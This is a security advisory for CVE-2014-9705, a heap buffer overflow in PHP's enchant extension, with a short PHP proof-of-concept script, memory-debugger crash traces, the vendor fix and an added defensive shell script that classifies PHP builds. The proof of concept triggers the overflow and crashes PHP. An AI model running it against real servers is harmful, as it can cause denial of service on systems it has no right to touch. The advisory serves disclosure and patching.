Heap Buffer Overflow in PHP
Advisory ID: HTB23252
Product: PHP
Vendor: PHP
Vulnerable Versions: 5.6.5 and probably prior
Tested Version: 5.6.5
Advisory Publication: December 5, 2014 [without technical details]
Vendor Notification: December 5, 2014
Vendor Fix: February 19, 2015
Public Disclosure: December 5, 2014
Latest Update: March 15, 2015
Vulnerability Type: Buffer Errors [CWE-119]
CVE Reference: CVE-2014-9705
Risk Level: High
CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab
Advisory Details:

High-Tech Bridge Security Research Lab discovered a heap buffer overflow vulnerability in PHP which can be exploited to cause a denial of service or, potentially, to execute arbitrary code on the target system.

1) Heap Buffer Overflow in PHP: CVE-2014-9705

The vulnerability resides within the enchant_broker_request_dict() function of the enchant extension (ext/enchant/enchant.c). Requesting a dictionary from the same broker repeatedly while the previously returned dictionary resource is released each time (the PoC below does this by reassigning $d) makes the native implementation of the function write 4 bytes past the end of a 4-byte heap block that the same function allocated. An attacker who can make PHP execute such a sequence overwrites 4 bytes of heap memory and can cause a denial of service or, potentially, execute arbitrary code on the target system.

Two practical caveats. The overflow is reachable only through PHP code that calls enchant_broker_request_dict(), so an attacker must either run PHP code of their own or drive an application that issues these calls, and the enchant extension must be loaded in the target build; this is consistent with the AC:H component of the CVSS vector. The PoC demonstrates a crash under PHP's debug allocator and under AddressSanitizer; code execution from a single pointer-sized overwrite is the advisory's assessment of the primitive, not something the PoC shows.

PoC
========
<?php
$tag = 'en_US';                              // an en_US dictionary must be installed for the backend
$r = enchant_broker_init();                  // one broker, reused for every request below
$d = enchant_broker_request_dict($r, $tag);  // first dictionary from this broker
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);  // reassigning $d releases the previous dictionary resource
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);  // the overflow is reported inside enchant_broker_request_dict()
?>

Result:
========
The traces below were produced against a php-5.6.3 source tree (see the paths); the advisory's tested version is 5.6.5. First, PHP's debug memory manager reports the overflowed block:

[Fri Dec 5 13:32:59 2014]  Script:  '/home/symeon/Desktop/dict.php'
---------------------------------------
/home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
     Beginning:      OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
         Start:      OK
           End:      Overflown (magic=0x00000034 instead of 0xAF9A0F68)
                     At least 4 bytes overflown
---------------------------------------

Then AddressSanitizer attributes the write:

=================================================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
    #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
    #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
    #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
    #2 0xb616ef1e in ?? ??:0
    #3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
    #4 0xb6184b7f in __asan_report_error ??:?
    #5 0xb617db2e in __asan_report_store4 ??:?
    #6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

Reading the two reports together: the overflowed block is 4 bytes (pointer-sized on this 32-bit build), allocated at enchant.c:554, and the 4-byte store that runs past its end is at enchant.c:571 inside zif_enchant_broker_request_dict(), the native implementation of the PHP function. ASan's description of the target as "248 bytes to the right of a 0-byte region" and the internal CHECK failure that follows are best read as ASan being unable to describe memory that PHP's own allocator manages, not as a second finding; the authoritative size and location of the block come from the Zend debug report.
Solution:
Upgrade to PHP 5.6.6, the release that carries the vendor fix of February 19, 2015: http://php.net/archive/2015.php#id2015-02-19-2
Until the upgrade is in place, note that the vulnerable code is reachable only when the enchant extension is loaded: builds without ext/enchant, or with it disabled, do not expose enchant_broker_request_dict() at all.
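As an added triage helper (not part of the HTB23252 advisory and not a PHP project tool), the POSIX shell script below classifies a PHP build from the output of `php -v` and `php -m`. It applies two facts from the advisory: the vulnerable function lives in ext/enchant, so the enchant module must be loaded for the code to be reachable, and 5.6.6 is the fix release. Builds older than the 5.6 branch are reported as "probably affected" (the advisory's own wording) rather than as fixed or affected, since the 5.6.6 threshold says nothing about other branches. The sample banner and module list embedded in the script are constructed, not captured from a real host, so the script runs offline; when a php binary is on PATH the live output is used instead.

```shell
#!/bin/sh
# Triage helper for CVE-2014-9705 (HTB23252). Added example, not part of the
# advisory. Classifies a PHP build from `php -v` / `php -m` output.

# vercmp_lt A B: return 0 when dotted version A sorts strictly before B.
# Only the first three numeric components are compared; a distribution suffix
# such as "5.5.9-1ubuntu4.5" is cut off at the first character that is not a
# digit or a dot, and missing components count as 0 (".0.0" is appended so that
# `cut` always finds three fields).
vercmp_lt() {
    _a="$(printf '%s\n' "$1" | sed 's/[^0-9.].*$//').0.0"
    _b="$(printf '%s\n' "$2" | sed 's/[^0-9.].*$//').0.0"
    _i=1
    while [ "$_i" -le 3 ]; do
        _x=$(printf '%s\n' "$_a" | cut -d. -f"$_i")
        _y=$(printf '%s\n' "$_b" | cut -d. -f"$_i")
        [ "${_x:-0}" -lt "${_y:-0}" ] && return 0
        [ "${_x:-0}" -gt "${_y:-0}" ] && return 1
        _i=$((_i + 1))
    done
    return 1
}

# php_version_from_banner: extract "5.6.5" from the first line of `php -v`
# output ("PHP 5.6.5 (cli) (built: ...)"). Prints nothing if it does not match.
php_version_from_banner() {
    printf '%s\n' "$1" | sed -n '1s/^PHP \([0-9][0-9.]*[0-9]\).*$/\1/p'
}

# enchant_loaded: return 0 when the `php -m` module list has a line that is
# exactly "enchant" (case-insensitive). ext/enchant is not built by default.
enchant_loaded() {
    printf '%s\n' "$1" | grep -qix 'enchant'
}

# assess BANNER MODULES: print exactly one classification token.
#   enchant-not-loaded               vulnerable function is not reachable
#   fixed                            5.6.6 or later (vendor fix release)
#   affected                         5.6.x below 5.6.6
#   probably-affected-verify-branch  older branch: advisory says "probably
#                                    prior"; check that branch's changelog
#   unknown-version                  banner did not parse
assess() {
    _ver=$(php_version_from_banner "$1")
    if [ -z "$_ver" ]; then
        echo "unknown-version"
    elif ! enchant_loaded "$2"; then
        echo "enchant-not-loaded"
    elif vercmp_lt "$_ver" 5.6; then
        echo "probably-affected-verify-branch"
    elif vercmp_lt "$_ver" 5.6.6; then
        echo "affected"
    else
        echo "fixed"
    fi
}

# Constructed sample output (not captured from a real host) so the script runs
# offline; the live php on PATH is used when one is available.
SAMPLE_BANNER='PHP 5.6.5 (cli) (built: Dec  5 2014 12:00:00)'
SAMPLE_MODULES='[PHP Modules]
Core
ctype
enchant
json
[Zend Modules]'

if command -v php >/dev/null 2>&1; then
    assess "$(php -v 2>/dev/null)" "$(php -m 2>/dev/null)"
else
    assess "$SAMPLE_BANNER" "$SAMPLE_MODULES"
fi
```

Run it on each host that serves PHP; "affected" and "probably-affected-verify-branch" both warrant the upgrade above, while "enchant-not-loaded" means the vulnerable function is simply not present in that build, which is why checking `php -m` before the version saves needless emergency patching.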
References:
[1] High-Tech Bridge Advisory HTB23252 - https://www.immuniweb.com/advisory/HTB23252 - Heap Buffer Overflow in PHP.
[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE is a dictionary of publicly known information security vulnerabilities and exposures.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.